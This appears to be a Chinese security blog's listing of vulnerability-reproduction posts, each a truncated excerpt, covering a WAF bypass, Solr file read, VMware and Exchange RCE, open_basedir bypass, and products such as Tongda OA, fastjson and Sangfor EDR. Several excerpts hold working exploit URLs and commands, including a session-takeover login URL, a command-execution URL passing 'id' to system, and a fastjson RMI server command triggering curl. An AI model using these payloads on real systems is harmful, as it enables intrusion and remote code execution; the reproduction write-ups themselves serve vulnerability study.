记一次刨根问底的HTTP包WAF绕过

POST /sql/post.php HTTP/1.1 Host: 192.168.1.72 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.76 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;...

Apache-Solr 任意文件读取漏洞复现

使用Docker docker pull solr docker run --name solr2 -d -p 8081:8983 solr 然后进入容器 #如果不把这块放进去新建core 的时候会报错的 cd /opt/solr-8.7.0/ser...

CVE-2021-21978:VM View Planner RCE 漏洞复现

环境地址: https://my.vmware.com/en/group/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394 打开vm Workstation 选择打开...

CVE-2021-26855 Exchange Server RCE 复现

一、环境搭建 虚拟机配置 4核心16G 120SSD 1.1 安装AD 域控 参考: https://blog.csdn.net/zhaowei198311/article/details/107391577 然后下载Exchange https://www...

bypass open_basedir 简约方法

一、open_basedir的配置 解锁: chattr -i .user.ini 加锁: chattr +i .user.ini .user.ini配置 open_basedir=/项目路径/:/tmp/:/proc/ 例: open_basedir=/www...

通达OA11.7 任意用户登陆

通达OA 任意用户登陆 条件需要管理员在线 http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 访问路径,覆盖了session直接用cookie登陆...

fastjson_rce_tool

https://github.com/wyzxxz/fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp f...

深信服DER RCE 复现

https://url:9443/tool/log/c.php?strip_slashes=system&host=id 任意用户登陆 https://xxxxx:5000/ui/login.php?user=admin ...